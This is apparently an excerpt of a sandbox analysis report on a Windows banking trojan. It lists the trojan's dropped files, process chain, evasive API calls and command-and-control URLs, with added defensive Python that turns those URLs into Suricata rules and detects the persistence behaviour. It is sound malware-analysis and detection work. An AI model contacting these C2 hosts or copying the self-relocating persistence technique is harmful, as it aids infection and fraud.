          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.html3
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmlH4
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmlW
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmll4
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/477/877.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html1
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html1l
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.htmlom/4;ls
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.htmlp
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.htmlj4
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.htmlp4
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.html
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.html22658-3693405117-2476
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.htmlBu
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.htmlL
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/932/965.html
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/158/381.html
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/158/381.html4u
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.html(
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlKl
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlasuek.com
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlom/913/437.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html)
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html0
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html9
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlA
          Source: omsecor.exe, 00000005.00000002.2717777167.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmll
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmll%
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmllC
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlo
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlq
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmls
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlw
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmly
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.html)le
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.htmlo
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.htR
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.htmlU
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/913/437.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/9Sl
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/Z
          Source: nNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/lousta.net5
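The URL strings above were recovered by scanning process memory dumps, so many carry one or more stray bytes after `.html` (neighbouring memory contents, not part of the URL), a few are truncated (`65/168.htR`, `/9Sl`), and the string pulled from the dropped files concatenates the three base URLs back to back. Before these can be used as indicators they have to be normalised into a deduplicated host/path set. The following Python is an added example, not part of the Joe Sandbox report, that does that normalisation over lines in the report's "String found in binary or memory" shape and turns the resulting hosts into Suricata host rules. The sample lines are constructed from entries on this page, the `<digits>/<digits>.html` path shape is inferred from the URLs listed here, and the SID range is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample: entries copied in the shape of the report's
# "String found in binary or memory" lines (hosts and paths from this page).
SAMPLE_REPORT = """\
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/526/179.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/526/179.htmlQ
String found in binary or memory: http://lousta.net/691/461.html)n%
String found in binary or memory: http://mkkuei4kdsz.com/
String found in binary or memory: http://ow5dirasuek.com/503/726.htmlom/913/437.html
String found in binary or memory: http://ow5dirasuek.com/65/168.htR
String found in binary or memory: http://ow5dirasuek.com/9Sl
Source: nNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
"""

STRING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")
# C2 URL shape observed in this report: http://<host>/<digits>/<digits>.html
# (assumed to be the beacon format; anything else after the host is treated
# as residue or truncation and only the host is kept).
C2_URL_RE = re.compile(
    r"^http://(?P<host>[a-z0-9.-]+\.[a-z]{2,})/(?P<path>\d+/\d+\.html)?"
)


def split_urls(blob: str) -> list[str]:
    """Split a memory string at every 'http://' so that concatenated
    URLs (as in the embedded configuration string) are handled one at a time."""
    parts = blob.split("http://")
    return ["http://" + p for p in parts[1:]]


def normalise(url: str):
    """Return (host, path) with residue bytes stripped; path is None when the
    bytes after the host do not form the <digits>/<digits>.html shape.
    Returns None when the string is not an http:// URL at all."""
    m = C2_URL_RE.match(url.lower())
    if not m:
        return None
    return m.group("host"), m.group("path")


def extract_iocs(report_text: str) -> dict[str, list[str]]:
    """Map each C2 host to the sorted, deduplicated list of beacon paths
    recovered for it; hosts seen only as bare URLs get an empty list."""
    iocs: dict[str, set[str]] = defaultdict(set)
    for m in STRING_RE.finditer(report_text):
        for url in split_urls(m.group(1)):
            hit = normalise(url)
            if hit is None:
                continue
            host, path = hit
            paths = iocs[host]          # registers the host even without a path
            if path:
                paths.add("/" + path)
    return {host: sorted(paths) for host, paths in sorted(iocs.items())}


def to_suricata_rules(iocs: dict[str, list[str]], sid_start: int) -> list[str]:
    """One host-match rule per C2 domain. The beacon paths rotate per request
    (several per host above), so the host is the stable indicator; the path
    shape is left out to avoid false positives on unrelated sites."""
    rules = []
    for n, host in enumerate(sorted(iocs)):
        rules.append(
            "alert http $HOME_NET any -> $EXTERNAL_NET any "
            f'(msg:"Neconyd C2 host {host}"; flow:established,to_server; '
            f'http.host; content:"{host}"; endswith; '
            f"classtype:trojan-activity; sid:{sid_start + n}; rev:1;)"
        )
    return rules


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_REPORT)
    for host, paths in found.items():
        print(host, paths)
    print("\n".join(to_suricata_rules(found, 9000001)))
```

Run against the full report text, the same two functions give the complete host list and every distinct beacon path; `endswith` on `http.host` is deliberate so that a host header such as `www.lousta.net` still matches while the rule stays cheap.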

E-Banking Fraud

Source: Yara match | File source: Process Memory Space: nNX5KYQRhg.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: omsecor.exe PID: 3756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: omsecor.exe PID: 1268, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: omsecor.exe PID: 3908, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\omsecor.exe | File created: C:\Windows\SysWOW64\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe | File created: C:\Windows\SysWOW64\merocz.xc6
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00401C41
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040D2A4
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040B51C
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_00401C41
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: String function: 00405511 appears 56 times
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: String function: 00405511 appears 56 times
Source: nNX5KYQRhg.exe | Static PE information: invalid certificate
Source: nNX5KYQRhg.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | File created: C:\Users\user\AppData\Roaming\omsecor.exe
Source: nNX5KYQRhg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: nNX5KYQRhg.exe | ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | File read: C:\Users\user\Desktop\nNX5KYQRhg.exe
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_5-5766)
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_0-5765)
Source: unknown | Process created: C:\Users\user\Desktop\nNX5KYQRhg.exe "C:\Users\user\Desktop\nNX5KYQRhg.exe"
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe | Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\omsecor.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040D293 push ecx; ret 5_2_0040D2A3
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040CBB5 push ecx; ret 5_2_0040CBC8

Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
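The process chain recorded earlier on this page (the desktop sample starts C:\Users\user\AppData\Roaming\omsecor.exe, which starts C:\Windows\SysWOW64\omsecor.exe with a command line naming C:\Windows\System32\omsecor.exe, which relaunches itself with /nomove) together with the file drops in this section give three host-side signals that do not depend on the C2 domains: a process running from a user-writable path writing an executable into the Windows system directory, a child that is a copy of its parent relocated to another directory, and a 32-bit process whose command line names System32 while the image actually loaded lives in SysWOW64 (WOW64 file-system redirection, which is normal for any 32-bit launch of a System32 path and is therefore only a corroborating signal). The Python below is an added example, not part of the Joe Sandbox report, that applies those three checks to a constructed, simplified stream of Sysmon-style process-create (EID 1) and file-create (EID 11) events. The event dicts are an invented shape, not Sysmon's real schema, and the PID assignment is an assumption: the report lists the PIDs 2848, 3756, 1268 and 3908 without mapping them to the individual omsecor.exe instances.

```python
import ntpath
from dataclasses import dataclass

# Constructed, simplified event stream standing in for Sysmon EID 1 (process
# create) and EID 11 (file create). Paths follow the report's process tree;
# PIDs are assumed. The last event is a benign control that must not fire.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 2848, "ppid": 1000, "image": r"C:\Users\user\Desktop\nNX5KYQRhg.exe",
     "cmdline": r'"C:\Users\user\Desktop\nNX5KYQRhg.exe"'},
    {"id": 11, "pid": 2848, "target": r"C:\Users\user\AppData\Roaming\omsecor.exe"},
    {"id": 1, "pid": 3756, "ppid": 2848, "image": r"C:\Users\user\AppData\Roaming\omsecor.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\omsecor.exe"},
    {"id": 11, "pid": 3756, "target": r"C:\Windows\SysWOW64\omsecor.exe"},
    {"id": 1, "pid": 1268, "ppid": 3756, "image": r"C:\Windows\SysWOW64\omsecor.exe",
     "cmdline": r"C:\Windows\System32\omsecor.exe"},
    {"id": 11, "pid": 1268, "target": r"C:\Windows\SysWOW64\merocz.xc6"},
    {"id": 1, "pid": 3908, "ppid": 1268, "image": r"C:\Windows\SysWOW64\omsecor.exe",
     "cmdline": r"C:\Windows\SysWOW64\omsecor.exe /nomove"},
    {"id": 1, "pid": 5000, "ppid": 1000, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe"},
]

USER_WRITABLE = ("c:\\users\\",)
SYSTEM32 = "c:\\windows\\system32\\"
SYSWOW64 = "c:\\windows\\syswow64\\"
SYSTEM_DIRS = (SYSTEM32, SYSWOW64)


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _exe_from_cmdline(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def _under(path: str, prefixes) -> bool:
    """Case-insensitive 'path starts with one of prefixes'."""
    return path.lower().startswith(tuple(p.lower() for p in prefixes))


def analyse(events) -> list[Finding]:
    """Walk the events in order, remembering each PID's image so that file
    creates (which in this simplified shape carry only the PID) can be
    attributed to the creating process."""
    image_of: dict[int, str] = {}
    findings: list[Finding] = []
    for ev in events:
        if ev["id"] == 1:
            image = ev["image"]
            image_of[ev["pid"]] = image
            parent = image_of.get(ev["ppid"])
            # Rule 1: same file name as the parent, different directory.
            if (parent
                    and ntpath.basename(parent).lower() == ntpath.basename(image).lower()
                    and ntpath.dirname(parent).lower() != ntpath.dirname(image).lower()):
                findings.append(Finding("self_relocation", ev["pid"], f"{parent} -> {image}"))
            # Rule 2: command line says System32, loaded image is in SysWOW64.
            launched = _exe_from_cmdline(ev.get("cmdline", ""))
            if _under(launched, (SYSTEM32,)) and _under(image, (SYSWOW64,)):
                findings.append(Finding("wow64_redirected_launch", ev["pid"],
                                        f"{launched} resolved to {image}"))
        elif ev["id"] == 11:
            # Rule 3: a process from a user-writable path drops into a system dir.
            creator = image_of.get(ev["pid"])
            if creator and _under(creator, USER_WRITABLE) and _under(ev["target"], SYSTEM_DIRS):
                findings.append(Finding("user_path_writes_system_dir", ev["pid"],
                                        f"{creator} wrote {ev['target']}"))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.rule:28} pid={f.pid:<5} {f.detail}")
```

Writing into C:\Windows\SysWOW64 needs administrative rights, so rule 3 only fires when the dropper runs elevated, as it evidently did in this analysis; rule 1 is the most portable of the three, since it keys on the self-copy behaviour rather than on any path the author could change.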
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_0040350F
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_0040350F
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-5799
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-5799
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-5799
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_5-5799
